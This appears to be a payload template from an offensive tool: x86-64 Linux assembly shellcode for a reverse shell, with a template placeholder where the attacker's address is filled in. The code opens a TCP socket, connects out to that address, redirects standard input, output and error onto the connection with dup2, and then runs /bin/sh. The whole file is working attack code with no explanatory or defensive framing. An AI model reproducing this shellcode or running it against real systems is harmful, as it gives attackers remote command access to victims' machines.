socket:                                
    push byte 41                    ;   
    pop rax                         ;   
    cdq                             ;   
    push byte 2                     ;   
    pop rdi                         ;   
    push byte 1                     ;   
    pop rsi                         ;   
    syscall                         ;
connect:                            ;   
    xchg eax, edi                   ;   
    mov al, 42                      ;   
    mov rcx, {{ .Address }}         ;   
    neg rcx                         ;   
    push rcx                        ;   
    push rsp                        ;   
    pop rsi                         ;   
    mov dl, 16                      ;   
    syscall                         ;
dup2:                               ;   
    push byte 3                     ;   
    pop rsi                         ;
dup2_loop:                          ;   
    mov al, 33                      ;   
    dec esi                         ;   
    syscall                         ;   
    jnz dup2_loop                   ;
execve:                             ;   
    cdq                             ;   
    mov al, 59                      ;   
    push rdx                        ;   
    mov rcx, 0x68732f2f6e69622f     ;   
    push rcx                        ;   
    push rsp                        ;   
    pop rdi                         ;   
    syscall                         ;